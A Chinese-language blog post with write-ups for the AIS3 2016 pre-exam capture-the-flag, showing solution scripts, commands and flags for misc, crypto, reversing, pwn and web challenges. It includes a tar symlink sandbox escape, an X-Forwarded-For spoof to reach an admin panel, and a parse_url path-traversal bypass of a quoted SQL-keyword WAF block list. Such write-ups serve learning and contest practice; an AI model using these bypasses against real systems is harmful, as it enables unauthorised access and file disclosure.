Just Do it

夢不會逃走,逃走的一直都是自己

ais3 pre exam 2016 部分 write up

前言:
開始碰資安好像是去年差不多這個時間
不過去年沒進 ais3 ,那時候連什麼是buffer overflow 都沒聽過@@
這一年來斷斷續續玩,途中跑去玩無人機,讀人工智慧,
跑去看 acm 的書...
感覺自己真的好廢阿 - - ,做好多事情都是斷斷續續的...
共解了 11 題,不知道會不會進@@

Misc

01

直接讀檔:
ais3{2016_^_^_hello_world!}

02

就是給7z ,要 patch 他(7Z -> 7z),裡面有兩個檔案,一個檔案有加密
密碼是另一個檔的檔名,就一直重複做

import os

for i in range(1000):
    os.system("ls | grep -v secret.txt | grep -v 1.py | grep -v temp.txt > temp.txt")
    with open("temp.txt") as f:
        fname = f.read().split('\n')[0]
        f.close()

    with open(fname,'r+b') as f:
        f.seek(1)
        f.write('z')
        f.close()

    with open('secret.txt') as f:
        secret = f.read().strip('\n')

    os.system('cat secret.txt > ../old')
    os.system('rm secret.txt')
    os.system('7z x -p'+secret+' '+fname)
    os.system('rm '+fname)

03

前言:
因為不知道怎樣把數值傳遞進去,卡了5、6個小時...

簡單說一下 程式碼

一開始會先讀一個 數值 (遇到 \n 結束)

再以該數值為大小,去讀資料 (遇到 eof 結束或剛好滿足大小就結束)

傳遞的資料要是 tar 不然會出錯

然後 tar 裡面要包一個 guess.txt 

guess.txt 必須是 symbolic link 指到 flag.txt

過程:

$ ln -s ../flag.txt guess.txt
$ tar -cvf a.tar guess.txt
$ wc a.tar ## get size is 10240  大小要小於 65536
$ echo 10240 > size.txt

$ xxd -p a.tar > data

這樣就好了

root@sol:/tmp/s# ( cat size.txt ; xxd -r -p data ) | nc quiz.ais3.org 9150
ais3{First t1me 1$sc4pe tHE S4nd80x}

Crypto

第二題沒解,一看就想說是 LEA洞,不過這次Crypto的題目是到第三天晚上才打開來看
,先解完第三題就不想解了,第三題搞得有點煩= =

01

一開始還沒提示就想說是 xor

只是下 xortool -c 20 ./crypto1

也沒東西出來

到第三天看了幾個 write up

改下 xortool -c 20 -m 257 ./crypto1

1 possible key(s) of length 39:
ais3{XoR_enCrYPtiON_15_n0t_a_G00d_i!ea}
Found 1 plaintexts with 95.0%+ printable characters
See files filename-key.csv, filename-char_used-perc_printable.csv

所以是因為 default try 的 長度太短,改要求長一點就可以...

不過這樣送是錯的

上網找了一下明文,比對一下改成

ais3{XoR_enCrYPtiON_15_n0t_a_G00d_idea}

03

這題給了很多 public key

大概意思是
假設:
p,q : 3 x 5 = n1
p,q : 3 x 11= n2

則 gcd(n1,n2) = 3 = p

就可以再推導出其 q (n / p)

而如果 gcd(n1,n2) == 1

則代表沒有共通的 p

主要參考:
backdoor CTF 2015: RSALOT


一堆垃圾的 public key ... 然後因為 flag.enc 沒有加padding

故還要加 -raw 否則會出錯= = ,靠杯這裡我卡最久...雷

試到 10.pub 出現答案

ais3{Euc1id3an_a1g0ri7hm_i5_u53fu1}




import rsa
from Crypto.PublicKey import RSA
from gmpy2 import *

keys = {}


filenames = next(os.walk("."))[2]
for filename in filenames:
    if(filename[-3:] == "pub"):
        f = open(filename, 'rb')
        externKey = f.read()
        f.close()
        keys[int(filename[:-4])] = RSA.importKey(externKey)


因為 code 寫得斷斷續續就不附了...
最後,工人智慧...

p = int(gcd(keys[4].n,keys[10].n))
q = keys[10].n / p
n = keys[10].n
e = keys[10].e
phi_n = (q-1)*(p-1)
d = int(invert(e,phi_n))

os.system('python rsatool.py -p ' + str(p) + ' -q '+ str(q) + ' -e ' + str(e) + ' -o priv.key')

os.system("openssl rsautl -in flag.enc -inkey priv.key -decrypt -raw")

Binary

第三題沒解,一看ida pro 那滿滿的 code 就算了

01

#ord('i')^i << (i^9&3)  | ord('i')^i <<  8-((i^9&3)) 


from string import *
ch = printable
cipher = [    0xca , 0x70 , 0x93 , 0xc8 , 0x06 ,
            0x7f , 0x23 , 0xa1 , 0xe0 , 0x48 ,
            0x2a , 0x39 , 0xae , 0x54 , 0xf2 ,
            0x79 , 0xf2 , 0x84 , 0x8b , 0x05 ,
            0xa2 , 0x52 , 0x19 , 0x29 , 0xc4 ,
            0x54 , 0xaa , 0xf0 , 0xca ]

i = 0
for ans in cipher:
    for c in ch:
        a = ord(c)^i 
        s = (i^9)&3
        temp = hex( ((a<<s) | (a >> (8-s)) ) +8  )
        temp = int(temp[len(temp)-2:],16)
        if temp == ans:
            print c,
            break
    i = i+1

02




這題是 x64 shellcode

我先
$ ipython
from pwn import *
print disasm('H\xb8E YOU~?}PH\xb8WHERE ARPH\xb8NOTFLAG{PH\x89\xe6H1\xd2\xb0\x8c0\xc8\x88\x04\x16H\xff\xc2\xb0\x840\xc8\x88\x04\x16H\xff\xc2\xb0\x9e0\xc8\x88\x04\x16H\xff\xc2\xb0\xde0\xc8\x88\x04\x16H\xff\xc2\xb0\x960\xc8\x88\x04\x16H\xff\xc2\xb0\x950\xc8\x88\x04\x16H\xff\xc2\xb0\xd50\xc8\x88\x04\x16H\xff\xc2\xb0\xdb0\xc8\x88\x04\x16H\xff\xc2\xb0\xb20\xc8\x88\x04\x16H\xff\xc2\xb0\xdb0\xc8\x88\x04\x16H\xff\xc2\xb0\xd90\xc8\x88\x04\x16H\xff\xc2\xb0\xcd0\xc8\x88\x04\x16H\xff\xc2\xb0\x9f0\xc8\x88\x04\x16H\xff\xc2\xb0\x880\xc8\x88\x04\x16H\xff\xc2\xb0\x9b0\xc8\x88\x04\x16H\xff\xc2\xb0\x880\xc8\x88\x04\x16H\xff\xc2\xb0\x9f0\xc8\x88\x04\x16H\xff\xc2\xb0\x9e0\xc8\x88\x04\x16H\xff\xc2\xb0\x880\xc8\x88\x04\x16H\xff\xc2\xb0\xcd0\xc8\x88\x04\x16H\xff\xc2\xb0\x940\xc8\x88\x04\x16H\xff\xc2\xb0\x820\xc8\x88\x04\x16H\xff\xc2\xb0\x930\xc8\x88\x04\x16H\xff\xc2\xb0\x900\xc8\x88\x04\x16H\xff\xc2j<XH1\xff\x0f\x05')
   0:   48                      dec    eax
   1:   b8 45 20 59 4f          mov    eax,0x4f592045
   6:   55                      push   ebp
   7:   7e 3f                   jle    0x48
   9:   7d 50                   jge    0x5b
   b:   48                      dec    eax
   c:   b8 57 48 45 52          mov    eax,0x52454857
  11:   45                      inc    ebp
  12:   20 41 52                and    BYTE PTR [ecx+0x52],al
  15:   50                      push   eax
  16:   48                      dec    eax
  17:   b8 4e 4f 54 46          mov    eax,0x46544f4e
  1c:   4c                      dec    esp
  1d:   41                      inc    ecx
  1e:   47                      inc    edi
  1f:   7b 50                   jnp    0x71
  21:   48                      dec    eax
  22:   89 e6                   mov    esi,esp
  24:   48                      dec    eax
  25:   31 d2                   xor    edx,edx
  27:   b0 8c                   mov    al,0x8c
  29:   30 c8                   xor    al,cl
  2b:   88 04 16                mov    BYTE PTR [esi+edx*1],al
  2e:   48                      dec    eax
  2f:   ff c2                   inc    edx
  31:   b0 84                   mov    al,0x84
  33:   30 c8                   xor    al,cl
  35:   88 04 16                mov    BYTE PTR [esi+edx*1],al
  38:   48                      dec    eax
  39:   ff c2                   inc    edx
  3b:   b0 9e                   mov    al,0x9e
  3d:   30 c8                   xor    al,cl
  3f:   88 04 16                mov    BYTE PTR [esi+edx*1],al
  42:   48                      dec    eax
  43:   ff c2                   inc    edx
  45:   b0 de                   mov    al,0xde
  47:   30 c8                   xor    al,cl
  49:   88 04 16                mov    BYTE PTR [esi+edx*1],al
  4c:   48                      dec    eax
  4d:   ff c2                   inc    edx
  4f:   b0 96                   mov    al,0x96
  51:   30 c8                   xor    al,cl
  53:   88 04 16                mov    BYTE PTR [esi+edx*1],al
  56:   48                      dec    eax
  57:   ff c2                   inc    edx
  59:   b0 95                   mov    al,0x95
  5b:   30 c8                   xor    al,cl
  5d:   88 04 16                mov    BYTE PTR [esi+edx*1],al
  60:   48                      dec    eax
  61:   ff c2                   inc    edx
  63:   b0 d5                   mov    al,0xd5
  65:   30 c8                   xor    al,cl
  67:   88 04 16                mov    BYTE PTR [esi+edx*1],al
  6a:   48                      dec    eax
  6b:   ff c2                   inc    edx
  6d:   b0 db                   mov    al,0xdb
  6f:   30 c8                   xor    al,cl
  71:   88 04 16                mov    BYTE PTR [esi+edx*1],al
  74:   48                      dec    eax
  75:   ff c2                   inc    edx
  77:   b0 b2                   mov    al,0xb2
  79:   30 c8                   xor    al,cl
  7b:   88 04 16                mov    BYTE PTR [esi+edx*1],al
  7e:   48                      dec    eax
  7f:   ff c2                   inc    edx
  81:   b0 db                   mov    al,0xdb
  83:   30 c8                   xor    al,cl
  85:   88 04 16                mov    BYTE PTR [esi+edx*1],al
  88:   48                      dec    eax
  89:   ff c2                   inc    edx
  8b:   b0 d9                   mov    al,0xd9
  8d:   30 c8                   xor    al,cl
  8f:   88 04 16                mov    BYTE PTR [esi+edx*1],al
  92:   48                      dec    eax
  93:   ff c2                   inc    edx
  95:   b0 cd                   mov    al,0xcd
  97:   30 c8                   xor    al,cl
  99:   88 04 16                mov    BYTE PTR [esi+edx*1],al
  9c:   48                      dec    eax
  9d:   ff c2                   inc    edx
  9f:   b0 9f                   mov    al,0x9f
  a1:   30 c8                   xor    al,cl
  a3:   88 04 16                mov    BYTE PTR [esi+edx*1],al
  a6:   48                      dec    eax
  a7:   ff c2                   inc    edx
  a9:   b0 88                   mov    al,0x88
  ab:   30 c8                   xor    al,cl
  ad:   88 04 16                mov    BYTE PTR [esi+edx*1],al
  b0:   48                      dec    eax
  b1:   ff c2                   inc    edx
  b3:   b0 9b                   mov    al,0x9b
  b5:   30 c8                   xor    al,cl
  b7:   88 04 16                mov    BYTE PTR [esi+edx*1],al
  ba:   48                      dec    eax
  bb:   ff c2                   inc    edx
  bd:   b0 88                   mov    al,0x88
  bf:   30 c8                   xor    al,cl
  c1:   88 04 16                mov    BYTE PTR [esi+edx*1],al
  c4:   48                      dec    eax
  c5:   ff c2                   inc    edx
  c7:   b0 9f                   mov    al,0x9f
  c9:   30 c8                   xor    al,cl
  cb:   88 04 16                mov    BYTE PTR [esi+edx*1],al
  ce:   48                      dec    eax
  cf:   ff c2                   inc    edx
  d1:   b0 9e                   mov    al,0x9e
  d3:   30 c8                   xor    al,cl
  d5:   88 04 16                mov    BYTE PTR [esi+edx*1],al
  d8:   48                      dec    eax
  d9:   ff c2                   inc    edx
  db:   b0 88                   mov    al,0x88
  dd:   30 c8                   xor    al,cl
  df:   88 04 16                mov    BYTE PTR [esi+edx*1],al
  e2:   48                      dec    eax
  e3:   ff c2                   inc    edx
  e5:   b0 cd                   mov    al,0xcd
  e7:   30 c8                   xor    al,cl
  e9:   88 04 16                mov    BYTE PTR [esi+edx*1],al
  ec:   48                      dec    eax
  ed:   ff c2                   inc    edx
  ef:   b0 94                   mov    al,0x94
  f1:   30 c8                   xor    al,cl
  f3:   88 04 16                mov    BYTE PTR [esi+edx*1],al
  f6:   48                      dec    eax
  f7:   ff c2                   inc    edx
  f9:   b0 82                   mov    al,0x82
  fb:   30 c8                   xor    al,cl
  fd:   88 04 16                mov    BYTE PTR [esi+edx*1],al
 100:   48                      dec    eax
 101:   ff c2                   inc    edx
 103:   b0 93                   mov    al,0x93
 105:   30 c8                   xor    al,cl
 107:   88 04 16                mov    BYTE PTR [esi+edx*1],al
 10a:   48                      dec    eax
 10b:   ff c2                   inc    edx
 10d:   b0 90                   mov    al,0x90
 10f:   30 c8                   xor    al,cl
 111:   88 04 16                mov    BYTE PTR [esi+edx*1],al
 114:   48                      dec    eax
 115:   ff c2                   inc    edx
 117:   6a 3c                   push   0x3c
 119:   58                      pop    eax
 11a:   48                      dec    eax
 11b:   31 ff                   xor    edi,edi
 11d:   0f 05                   syscall


一開始以為是和去年一樣,結果都是segmatation fault 卡很久

就直接看 assembly 了= =

因為 flag 最後一定是 } ,而他最後一個是 \x90

故 '\x90' xor '}' = '\xed'  可以知道 cl = \xed

之後每個都 xor \xed 就是答案了


from Crypto.Util.strxor import strxor
cipher = [0x8c , 0x84 , 0x9e , 0xde , 0x96 , 0x95 , 0xd5 ,
           0xdb , 0xb2 , 0xdb , 0xd9 , 0xcd , 0x9f , 0x88 ,
           0x9b , 0x88 , 0x9f , 0x9e , 0x88 , 0xcd , 0x94 , 
           0x82 , 0x93 , 0x90 ]
cl = '\xed'
for i in cipher:
    print strxor(chr(i),cl),


$ python decoder.py
ais3{x86_64 reverse yo~}


Remote

pwn沒怎麼碰,只有解第一題,一看ida pro 想說是考srand(time(0)) 大概的
拿現成code 調一下時間就過了

01

from pwn import *
from ctypes import *

x=0x2016a153
cdll.LoadLibrary('libc.so.6')
libc = CDLL('libc.so.6')
libc.srand(libc.time(0))
a = libc.rand()

r = remote('quiz.ais3.org' ,2154)
#r = process('./remote1')
print r.recv()
r.sendline(str(a^x))
print r.recv()


[+] Opening connection to quiz.ais3.org on port 2154: Done
Enter passcode: 
Correct!
ais3{sEEd_is_cRiTiCaL_@_@}

[*] Closed connection to quiz.ais3.org port 2154

web

01

wargame web 必有的題目,都說什麼 google 找不到之類的

就是考 robots.txt

ais3{Y0u_beat_the_G00g1e!!}

02

curl --header "X-Forwarded-For: 127.0.0.1" "https://quiz.ais3.org:8012/panel.php"

<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <title>Admin Panel</title>
</head>
<body>
Admin's secret is: ais3{admin's_pane1_is_on_fir3!!!!!}</body>
</html>

03

view-source:https://quiz.ais3.org:8013///download.php?p=../

後面接 XXX.php  可以看內容

view-source:https://quiz.ais3.org:8013///download.php?p=../waf.php

可以看到 filter 的東西


<?php

include "you_should_not_pass.php";

# general WAF
function waf()
{
    $keywords = [
        "union",
        "select",
        "insert",
        "where",
        "update",
        "order",
        # danger!!!!
        "flag",
    ];

    $uri = parse_url($_SERVER["REQUEST_URI"]);
    parse_str($uri['query'], $query);
    foreach($keywords as $token)
    {
        foreach($query as $k => $v)
        {
            if (stristr($k, $token))
                bad();
            if (stristr($v, $token))
                bad();
        }
    }
}

waf();



洞在 parse_url  

參考:https://zeta-two.com/ctf/2015/10/04/sectctf-writeup.html

網址下:
view-source:https://quiz.ais3.org:8013///download.php?p=../flag.php


Ha! Ha! You can not see the content of this file, because it is PHP!!! :)

<?php
$flag = "CTF{haha!i_bypassed_the_fucking_waf!}";
?>

答案:
ais3{haha!i_bypassed_the_fucking_waf!}

其實這一題我應是解不出的,有被打一巴掌的感覺,幡然醒悟...